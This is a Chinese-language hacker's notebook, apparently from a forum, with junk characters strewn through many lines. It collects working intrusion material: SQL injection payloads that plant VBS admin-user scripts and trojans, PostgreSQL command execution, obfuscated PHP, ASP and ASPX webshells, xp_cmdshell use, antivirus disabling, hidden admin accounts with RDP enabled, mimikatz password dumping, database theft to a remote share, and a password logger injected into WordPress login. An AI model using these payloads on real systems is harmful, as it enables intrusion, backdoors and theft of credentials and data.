2 y+ G; I# O9 q) g" i9 b- K: R中文版本操作系统中针对mysql添加用户完整代码:" w- i3 V! y+ J3 ~
& Q0 O8 h7 |' S, @$ z7 g5 Vuse test;
# N7 O# O) k9 |+ Jcreate table a (cmd text);
6 z2 n0 {# l! W% j# _6 s) I! Hinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
' y2 H8 W, G L$ T6 oinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
4 s4 I7 L+ A# i$ Y0 hinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
. U' W n7 w) I% d, x3 xselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
+ S/ k! \8 D5 l$ T! t, ldrop table a;. j/ t4 `, B" y. \% h. @7 S
1 [4 f1 E, t, c
英文版本:
9 D& S. ^& p3 M( d3 m, { [/ o! _- l, \( H c
use test;
$ B7 Q+ `3 @$ ~/ ]/ i- O6 ^create table a (cmd text);1 W2 p4 y5 v% l- M1 l+ r
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
7 E' c, A# G" |, `3 ?8 vinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 Y' u( i4 N, M/ Z1 D) rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, n# Y" o7 h' B6 Kselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
& i0 U/ Z' Z R3 ]3 X) r, ^1 xdrop table a;: Y4 f: c+ p* t1 m* g& c8 `
6 X/ {. \8 U; q ?/ e) ]create table a (cmd BLOB);1 E& C+ \5 S6 _8 B' ?& M Y& e6 x
insert into a values (CONVERT(木马的16进制代码,CHAR));
7 r4 @2 O8 ]( i/ dselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe': c0 _# O2 x1 c, i/ z
drop table a;" y( E' G$ y$ q: z7 d9 t7 o
7 u r" C& R. {2 K! A& X3 T. c
记录一下怎么处理变态诺顿
3 n- t+ o7 i: ]$ s# f+ I查看诺顿服务的路径7 b. f0 ~" O2 o
sc qc ccSetMgr1 k+ j! K; ^9 u, }0 `6 M N
然后设置权限拒绝访问。做绝一点。。
+ \8 S2 k; y* L8 n$ P+ V- R4 e3 S8 ~6 Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
7 N7 `8 i% l% ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
& U) u. H( ]; L4 }! ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators* D# z& P* `& u* t* M' ]
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone1 g2 Y7 m2 P6 T/ }8 j" h
' W9 C4 j7 s g* ]3 B2 \0 V
然后再重启服务器
6 P3 F7 f4 v* C8 n% V8 @: I [iisreset /reboot
x& m; I4 [3 S% I这样就搞定了。。不过完事后。记得恢复权限。。。。
) f+ P, Q2 x2 W$ {) b1 Y9 icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F/ M, i0 Y' v# x) H, d
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
+ n; J: c& }9 S; @# b6 Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F+ {3 g: H3 Z Z( g; Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F3 `& n8 ?! X! L6 N& M& A; }) j
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin; G, w) o( p: U9 a8 r2 V+ H- q
, z5 C. G, {1 CEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')0 c% d3 t. h& D' t- w* ?) u
: E4 z( b% W* g% R5 t! k+ M
postgresql注射的一些东西$ h; q4 t1 g) R
如何获得webshell# r1 q# G$ ~! F. P1 J2 c
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); - r1 o' e6 Z+ }
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
2 `9 i3 P, r9 p5 s2 [0 A2 ?5 i0 zhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;7 s- x2 @. h; c2 \) `% m% x
如何读文件
* Q7 j6 m4 s. l. y5 lhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
" i2 C {( F# Q2 A: E6 qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
: A: \# {: Q9 zhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
: e/ z* `; J! [. n2 l, E
1 M, R' e8 T7 L/ r1 I$ I3 Lz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
+ W' G- d; s& e6 k& @当然,这些的postgresql的数据库版本必须大于8.X
' ^( Y8 u1 B: a3 p5 ]; a创建一个system的函数:5 H3 {* L4 F( Q! p' r
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT1 |0 m' x9 ~/ E8 k# N
' F/ [4 G1 N9 Y2 |7 [7 y' D
创建一个输出表:6 k( K3 f" Z. i: }% \3 C$ G
CREATE TABLE stdout(id serial, system_out text)% A% Q N6 w5 ]/ B" C8 v/ J; c
8 X' @6 Y, X! C5 o+ \- P
执行shell,输出到输出表内:
2 @8 Z1 U6 X, E* c! L4 LSELECT system('uname -a > /tmp/test')" y! o0 _$ l3 ?* e0 R8 z
+ [9 s0 T1 b8 _# e, s! S9 F
copy 输出的内容到表里面;
$ {# Y/ A! ?# I6 a5 ]COPY stdout(system_out) FROM '/tmp/test'
: R1 |, m3 |- Q. g" g7 p8 s2 r5 L: `* c( Z* n! Z" {
从输出表内读取执行后的回显,判断是否执行成功
8 B) v2 a+ r' |1 f7 J; C1 M) x$ }/ L! z: G, W8 J, ?1 g" a2 [: I
SELECT system_out FROM stdout
C( N. ~8 a& C/ N下面是测试例子
/ i8 T! O: i; c: ]4 ^8 ~6 l+ p- ]2 |3 K) N6 f7 B/ V# H P& U+ y
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 0 X$ {; S! q" G: V3 \; Q
. s1 _7 c% N. V; S6 m& a4 B3 G
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C': _ c, ? @* `; e/ q9 m
STRICT --
& D; q' C0 \2 m% f) T$ ]! h4 F+ A, k4 D3 v( U$ Q
/store.php?id=1; SELECT system('uname -a > /tmp/test') --# P& c, r! ~4 A- `' f; N
) _# ]1 _( Q! Q
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
: n+ p! \$ r/ c; |( c: ^/ } b9 V; j; G3 Y
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
. s0 d5 f5 i% l& b$ r1 Y) W) v/ knet stop sharedaccess stop the default firewall
1 g9 V8 F, c1 B& o# T8 bnetsh firewall show show/config default firewall# M# ~! y2 N9 J) }
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall3 R5 j" [5 L( D U; d9 h
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
1 {* h& K {7 {0 s$ v8 ]+ b/ r修改3389端口方法(修改后不易被扫出)
. @ z: i _% F& `& s8 a修改服务器端的端口设置,注册表有2个地方需要修改8 D, u& K" g; T- ]- T
4 I$ J+ s9 \# S, Z* [5 p5 l[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]7 W" R. C$ z+ _- }, d2 R6 z+ E
PortNumber值,默认是3389,修改成所希望的端口,比如6000. S# T1 t3 g: l3 m8 p
/ z l* C" X. Z第二个地方:+ b) j4 H1 @3 f3 u* S' k# M
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ) |+ `- R3 @" B6 d
PortNumber值,默认是3389,修改成所希望的端口,比如6000
% W: @0 B; [+ E3 }
) g% Z% H' K# r; o# [+ c7 E3 ?现在这样就可以了。重启系统就可以了5 E- G1 g7 ]6 i1 Q* d
0 T+ _' \3 h2 }; Q! W: ?( W6 E
查看3389远程登录的脚本3 H: r% c. k6 ~2 h
保存为一个bat文件- E* A& M! o# t$ ~
date /t >>D:\sec\TSlog\ts.log/ V8 r/ ], ~2 R% R
time /t >>D:\sec\TSlog\ts.log
0 ~0 H7 W* j% t7 F/ F: Ynetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log; u. P% B" g5 n# U1 H( ], U1 s
start Explorer
5 B% x, k) J0 I4 d9 G& ~% o3 M' Q* h! p6 Q. P1 n" h
mstsc的参数:
# ^) X3 S- S% s* M5 ?7 `
8 {/ m M" c1 [, r: y' Q! w远程桌面连接
( e8 q0 E& ?# S; R; Q6 c# C
1 W& h( N Y6 v/ Y% CMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]: t6 u: f3 _5 d5 q# u5 Y
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /? d; w$ D, s* s; R$ h" i9 ^2 }
$ H8 k3 ^; V1 q+ t/ v% G. r4 ?% F
<Connection File> -- 指定连接的 .rdp 文件的名称。$ N7 x2 E8 R, ?/ z1 T$ c9 }9 u6 H
& G3 _: M; Y2 Z/v:<server[:port]> -- 指定要连接到的终端服务器。
* Y8 e$ r; C# I6 N7 J5 X7 w
. _0 E: T8 _8 q" S" l' s/console -- 连接到服务器的控制台会话。
- X$ Y+ n" D9 ^2 X" x9 T/ E
8 G4 T p) S5 h% m/f -- 以全屏模式启动客户端。
, S0 P- B, G. C1 ]: ~
, V2 I) U/ Z5 k/w:<width> -- 指定远程桌面屏幕的宽度。; i% v# J& |( w i" o3 }' {( X
9 j: A8 p$ `) ]3 f7 L+ x
/h:<height> -- 指定远程桌面屏幕的高度。
* ~5 S7 M# }* c& r- h4 ?( G
! K' P6 h$ k5 d/edit -- 打开指定的 .rdp 文件来编辑。
( L! r. @8 U: _6 ^. Z+ F; X5 x, N. n( W
/migrate -- 将客户端连接管理器创建的旧版
& f, m# z. H" O: u8 L) z连接文件迁移到新的 .rdp 连接文件。- v: |: a" J* D8 w- X
. B; P: W4 F C* v/ ~& l
& p- s# k# p! X2 e$ _其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
4 f5 M, e0 G# _2 W0 {) ymstsc /console /v:124.42.126.xxx 突破终端访问限制数量
# Y: R4 ~$ u* g1 W" n! f3 W* M. ?3 f, [' b' U1 n A
命令行下开启3389% A4 C2 x9 @) `& `
net user asp.net aspnet /add6 X) N( ?6 F5 D! A
net localgroup Administrators asp.net /add
1 ]3 p! O+ p" u2 }1 tnet localgroup "Remote Desktop Users" asp.net /add, U/ H% k0 U. o7 v9 [0 k
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
% b9 t1 T1 Y! C0 z* recho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 03 p8 Z. Z' b' C( U' D0 e- r b0 V
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1& w$ D6 E, G' m, U+ u, `
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f/ D) E |6 `6 n$ H: @7 ~
sc config rasman start= auto, o' z" g9 C' W
sc config remoteaccess start= auto/ ] J" r/ t7 @& r
net start rasman# h" e6 B& ^1 k( j1 e
net start remoteaccess" l# u& s' a; O0 u# g
Media0 ]9 |5 \: C8 O, L% u6 `6 t% i
<form id="frmUpload" enctype="multipart/form-data"
9 {1 M. t, ]$ ?" @" @action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
4 W# M+ E4 `# [! q& K( w<input type="file" name="NewFile" size="50"><br>
' ]2 K; A; N b2 q4 d- B0 r, E! `* A<input id="btnUpload" type="submit" value="Upload">
( b9 _6 u3 C" Q$ d</form>5 v6 y9 \% V, h
* e. G& d* p' b* w
control userpasswords2 查看用户的密码
$ [5 t8 a; ]. Q oaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径$ I8 p3 W# W3 y( D0 D! P- [
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
5 J, @( p w2 v0 k) t7 T- ]& F/ o$ T7 H( ^- y( ]: ~" y
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
; {2 I8 ]& d; K1 {测试1:/ m0 P8 F) u, _! w
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t10 I9 l* n; E0 L' n: W" U4 m3 o
* R: Q* n3 q7 U9 H% q6 M! L6 \测试2:# @+ |. I$ f8 o. [ K/ D# ?
# a! W* @& x9 x4 u5 A
create table dirs(paths varchar(100),paths1 varchar(100), id int)3 w* d: j1 x8 ?* r4 j6 x
4 f" a+ H# ?' fdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- _( @2 }* k1 w" ?, W& [2 Q/ ~4 ^( {3 c$ R9 P& C* r4 F
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1! F0 N! x/ Q5 y' G0 s" B, x# Z- ?
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令$ [0 C7 R4 G2 i2 b
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
( f! z6 V% n+ z+ F, ~ j: anet stop mcafeeframework9 b2 \, k5 v4 ?% k
net stop mcshield0 k- Y6 U3 C( r& w& |- r
net stop mcafeeengineservice+ s, R; J6 r. v8 X4 |9 x/ D' V* E) a
net stop mctaskmanager" |" n- w, O9 f" z/ T0 f
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
* N8 {3 D: q+ p; p6 M( o- {8 w Z' X- _! k5 Q G
VNCDump.zip (4.76 KB, 下载次数: 1)
% |$ o1 k) w# R9 w密码在线破解http://tools88.com/safe/vnc.php
2 }$ @4 b9 y5 {# B: B* N+ M$ EVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
: f1 \: F' L* `" i( `$ `
4 E2 p: _) \! F; o4 ~" P5 R0 O. qexec master..xp_cmdshell 'net user'$ J5 y! G' T U2 p" v, u
mssql执行命令。' Q% O5 x1 g7 s( D, w, o
获取mssql的密码hash查询
, [! }, f# y! X0 e# Z. Tselect name,password from master.dbo.sysxlogins" y# u; |+ u9 ^" A. Y
5 f7 j, q. ?: [
backup log dbName with NO_LOG;5 B: F% C0 @8 B, W9 A" B& X
backup log dbName with TRUNCATE_ONLY;( ]( U" H) f1 R! m* O) [0 F6 m5 K, ~
DBCC SHRINKDATABASE(dbName);
" d: H4 v4 Z9 m2 X/ ^7 tmssql数据库压缩
# ]1 p7 a! s5 L0 j- m& J' w9 o$ g! S: \1 l: Z0 m
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
& o) d; d2 j9 v将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。 S! v& b* g) o- Y. r( }) C
- L6 I i- l8 s8 d9 U9 Obackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
, T3 B9 T3 }$ C( ~) v备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak) p6 H6 ^0 {6 F" Z; g
1 p' ^% n: i) U8 ]Discuz!nt35渗透要点:
$ a. x% r2 }6 z8 T/ b(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default) B/ {, \ i( A+ q y* s7 A
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>( F$ i8 |' O. P/ Z
(3)保存。
3 `& g# d! i& p* J4 E& P, l- S(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass- Z! a ]/ q$ M) p/ ]
d:\rar.exe a -r d:\1.rar d:\website\ p0 C7 H( n8 {( F/ u* a, P
递归压缩website b: _' V5 ^% ?( T/ D
注意rar.exe的路径
4 P5 S) s. V; w- R5 Q: z1 _, Y
i7 S2 R. Z, @" ?: ?. }<?php
4 ` }+ v7 d+ L& C4 n5 M. V
+ r3 d7 d) e0 f8 I: S$telok = "0${@eval($_POST[xxoo])}";& T; v8 |, l7 t* a. _" h k1 k# p
. U0 {6 t. t) s. _( U2 O7 s2 T
$username = "123456"; L- d7 Z6 _" u% ]5 n' Q S
R3 C$ A3 J$ U( B/ h9 @
$userpwd = "123456";9 L& s+ G. K! f* ?, c& @+ ^$ K
. Z }9 u1 l0 o) u& }( V$telhao = "123456";
, |2 I6 h! I2 E5 c; z4 K! ?) p/ Y
2 [& M4 s2 t# R0 y3 B$telinfo = "123456";2 W% I2 e2 g/ L! { }2 V7 p
" e4 f* ?6 N' i- Y7 \
?># u* [7 E. y8 }% q* U
php一句话未过滤插入一句话木马
- T/ O2 z9 x& {# Y y7 k
& s, m# v! m3 ^2 \4 m站库分离脱裤技巧
" @6 T2 _* g) Y3 H$ Bexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'5 F2 }1 }! [: L% K& T
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'0 @0 O% ?' `2 O' ?" s7 `
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。+ ]+ \" N8 [% X; E- h
这儿利用的是马儿的专家模式(自己写代码)。
3 y: b! c( u- ]& n' cini_set('display_errors', 1);, e& }2 L" g& ]" m( t
set_time_limit(0);
/ S2 O; a1 g" d4 Merror_reporting(E_ALL);0 l0 w& b; s5 e
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
4 U3 V" f2 s+ v2 rmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
8 v4 z4 D* T% S+ B% D. B t" q$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());0 Y+ R/ L/ s: x# r6 o' d8 H
$i = 0;
! c6 a2 T4 M1 p8 s. `: Y( j0 q$tmp = '';
9 p3 }/ P' y4 I3 d, Lwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {# x5 ^' U4 y0 U4 i
$i = $i+1;# r6 y b% L# j, P; q) s7 N
$tmp .= implode("::", $row)."\n"; m, I! ^0 r" I' V
if(!($i%500)){//500条写入一个文件
( T* L, f- E6 Z9 V $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';1 A; h9 i) ]' e8 H
file_put_contents($filename,$tmp);3 B" w3 |5 {' l
$tmp = '';
1 E/ ?; e& R1 `4 V% v }
- Y& s! v5 k: n$ J0 i$ I2 Q: z6 s}
9 b* A% u* O# Q7 ^- m* v3 y# mmysql_free_result($result);$ ~5 v7 i. C9 f. Q
0 b( P, S4 y& C! N/ O. {
# @% m: F& {) q4 ?
4 [9 r( M4 P0 O7 S//down完后delete
7 ~& [3 B& \# D8 [# f% M9 p# n3 C& h E
# _) _) ]7 P& n, f& z
ini_set('display_errors', 1);
, `( y3 ^8 ^1 Y+ Herror_reporting(E_ALL);4 P A( t0 U3 c
$i = 0;5 e) l3 Y0 J3 R' {+ X5 G& `3 P1 l
while($i<32) {4 T; J* Z4 `( `8 H1 y* ~
$i = $i+1;
; F' ]. Y# V5 w7 P( }( [0 z* k% d! F $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';% O! ^: t7 a) E. B( |. Z
unlink($filename);% p( O6 L" V' Z
}
1 Q$ Y* U0 E8 v# ^! c6 ghttprint 收集操作系统指纹
' v S& [( h- F; ]6 I4 P5 y扫描192.168.1.100的所有端口
; }0 W1 u7 p! Vnmap –PN –sT –sV –p0-65535 192.168.1.100
: A, N) O7 E: O$ Rhost -t ns www.owasp.org 识别的名称服务器,获取dns信息) V$ ~; K1 i6 b7 u, m% ^& d3 @$ j
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输, n" G8 U5 y: M. i/ F7 I
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host( W9 {% l; {' [; j/ [# Q% \
9 `$ ]3 [* ^( ~2 f& T$ h+ gDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)! W4 F. G3 l8 @! t8 z% u
9 r. [& [- j" U% z
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
. _/ y: R8 |& \ r* v0 \' u8 a! A7 r6 n$ [+ V/ }
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
( A1 g9 O& o$ ~3 r3 n0 E/ @
" Q6 s( a$ m6 p DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)+ u9 O* g+ m9 E+ `% o2 M+ b/ I
+ w6 m3 U9 w1 |9 H
http://net-square.com/msnpawn/index.shtml (要求安装)4 t2 J( E( c+ f% H, e
& T4 ]( s9 b( k# d4 A6 }3 N2 q tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)* k! |& S, d0 n% d
' b: ~& A: g6 ^% g% I- |; v
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)9 [9 _' ^% f* E5 f: `; P
set names gb2312) U5 b0 x+ g" \4 T3 n& J$ ?: r9 p+ y, R
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
3 I4 P7 U! r/ X7 n" p: \
: K, j) D. e2 k% D: o( y, ^mysql 密码修改
/ \* W! X2 {4 w8 O. ~& D, M2 EUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” / P4 c- k9 V b* p6 Q: O$ e
update user set password=PASSWORD('antian365.com') where user='root';+ D' P- e7 t( ?
flush privileges;3 m3 H/ U5 {" X+ X. B5 e; b
高级的PHP一句话木马后门3 U3 i4 s# ?- J% y0 c* y
# |; r7 o; \# r* w/ A$ V% o, ?1 K入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀4 I! w) D7 B. X; V
& ?) b# n! x% C# {1 r# l
1、
, [4 l! D4 v' N( J
7 P( V8 p a, z+ L$ O. u$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; _6 z3 t5 n1 k- ~# l+ C: t- k" B- y1 [1 k' i
$hh("/[discuz]/e",$_POST['h'],"Access");& u, L! c0 b7 t6 x& g* u
8 f8 ~3 ?1 g6 _- V//菜刀一句话: U! ^5 L6 x: C! K) T8 n
" i" B8 _1 a( s# B3 H2、
9 P- I" }* {. f/ W" B- X6 E6 O/ U1 G8 c( T8 K" }2 j6 G
$filename=$_GET['xbid'];8 w v4 ^0 ]+ j7 w. d0 o! [
/ ~$ Z9 e6 j; w+ V! p
include ($filename);, p5 d p" q% O9 V3 P+ P
/ m" u* F {' O2 y4 U& }( v1 ^& f8 j- w//危险的include函数,直接编译任何文件为php格式运行* I3 o! @; n0 n
) U3 m/ B& T" U$ }
3、
3 j9 {: r3 B( [# x. u8 Y1 |% @( r! e; I
$reg="c"."o"."p"."y";
$ k0 ]6 W# K0 J9 I/ o. M7 ?& N
8 Y( s4 g8 G4 F S. P$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);3 ]0 _9 ]* I; s$ O; y1 R/ l9 ^
' A0 r: ~; u' k% c//重命名任何文件9 W+ N7 D1 Z! F9 V! t- u
- G8 R4 `) s5 D' v9 t8 a4、
5 \$ |+ l! c' R5 j8 B6 `2 D2 [0 w5 n% u5 }
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; u0 v$ h9 y/ O6 F# d
* Y' G" z" [4 I7 P0 _, m2 F* d$gzid("/[discuz]/e",$_POST['h'],"Access");
& i. ~% F7 A) s& D- F& F1 B( q @, {! O3 S9 n8 H, b
//菜刀一句话
. d0 [. z* u5 Q7 w7 e& @9 @3 W/ M% v. J8 W
5、include ($uid);
6 Z1 W$ G+ z$ F h9 w6 c2 K" n8 ^/ O6 Y1 B3 d. a' @9 [9 u
//危险的include函数,直接编译任何文件为php格式运行,POST 4 @5 m" h& [: t, B; `% [
. M# q/ h* I' w# i! U* }
+ c2 w* o& |, w6 l% H9 t- K7 j//gif插一句话# d( P( G2 e: v; Q6 a4 g# U2 n3 m
' s- i3 N& R9 F. m) S+ d8 U6、典型一句话
; c7 S" u/ x2 X: s, ~, ~) G) i4 Y4 [5 v
程序后门代码
+ \0 F9 B5 e! y6 X% d<?php eval_r($_POST[sb])?>/ ^* U( E3 B" o2 C2 D
程序代码
' {- j9 r3 P8 X1 c<?php @eval_r($_POST[sb])?>( j! S. N; s/ r* _1 B/ N/ O
//容错代码) y6 Y( V* W) W( a: n2 z
程序代码0 d$ W B6 p" q/ {% j/ N! ?& k7 J/ A
<?php assert($_POST[sb]);?>; P1 M: Y2 `3 }' ]5 ?0 f% g0 ~
//使用lanker一句话客户端的专家模式执行相关的php语句, L1 k( Y6 s y2 Y) \
程序代码( m% B4 d' N5 G' `5 p9 O
<?$_POST['sa']($_POST['sb']);?>1 J' b1 I) k8 R; Z* l
程序代码% G# w5 C9 n0 T# H+ ~
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>0 k7 f' u! q6 v8 E4 N; O i
程序代码$ l. G$ ^5 S" P4 `9 {
<?php
( a. K( B/ C9 Q8 U4 m3 q5 {@preg_replace("/[email]/e",$_POST['h'],"error");
. o. N# `3 y I7 m' W) \$ j9 g' Y?>
5 m) \9 v, J) s1 {//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
$ J0 x& X5 `# U0 b7 }6 v3 z5 m程序代码# Q& R2 F4 N2 R) `% p
<O>h=@eval_r($_POST[c]);</O>' k: R$ r1 b7 W+ ~3 I) l) b
程序代码
( `5 T) Z v: t1 L<script language="php">@eval_r($_POST[sb])</script>8 ^9 M( v( [# P- Y
//绕过<?限制的一句话
7 E+ W+ q% x8 _1 T- F
1 N1 l% I& Y; U8 yhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
: f7 r" G! y! M5 }详细用法:
1 I2 \2 a1 P& {4 p$ F! _1、到tools目录。psexec \\127.0.0.1 cmd5 d- V$ r3 O8 f- P, L8 u
2、执行mimikatz1 f& ]5 N9 |, z4 q
3、执行 privilege::debug g4 L4 N Y* n7 ]3 a! A5 s
4、执行 inject::process lsass.exe sekurlsa.dll
- E+ [% V$ `9 ?. o0 a9 z5、执行@getLogonPasswords
# R: l/ ]9 `5 z7 v5 `+ [1 X6、widget就是密码
1 E7 x1 l# |* ?7、exit退出,不要直接关闭否则系统会崩溃。
( j7 O$ F5 l2 n0 c- A$ r. M
& c8 _- a/ Z+ e* p: i: Zhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面$ t5 g2 v A' K, K
9 b+ h7 c( B+ W; ~4 r6 d自动查找系统高危补丁$ y( y! f4 F( s! C. ^0 z% s
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt% L' z; t' z) ^3 t" _
4 x" c9 v" g$ n2 t" t7 d5 W
突破安全狗的一句话aspx后门3 B* C x& N6 I/ _ ]) b
<%@ Page Language="C#" ValidateRequest="false" %>
, @* Q0 ]8 t+ Q# e% O. ~0 ^0 h<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
3 O+ s1 q7 W h3 B8 iwebshell下记录WordPress登陆密码- n5 H' j6 h4 h" ^4 k" W
webshell下记录Wordpress登陆密码方便进一步社工' z, b7 M0 R3 o/ R5 N/ F' l P
在文件wp-login.php中539行处添加:
4 |/ B' f2 s9 r3 q/ Z// log password/ @ r# A, [+ i/ ?
$log_user=$_POST['log'];: P( V: s. d" a$ b1 c/ y8 J
$log_pwd=$_POST['pwd'];
* D+ M9 s) n* V" Z2 l) p$log_ip=$_SERVER["REMOTE_ADDR"];
. U9 F8 T; z* e, a g- K& {) d) c$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
; v- c9 N0 u8 P& ]7 u3 c$txt=$txt.”\r\n”;
8 x) c) L0 S% {3 b1 C r; K# Q" a% Dif($log_user&&$log_pwd&&$log_ip){
/ A3 {- B# o/ h0 u5 @@fwrite(fopen(‘pwd.txt’,”a+”),$txt);5 l* V! a+ A, @4 C
}
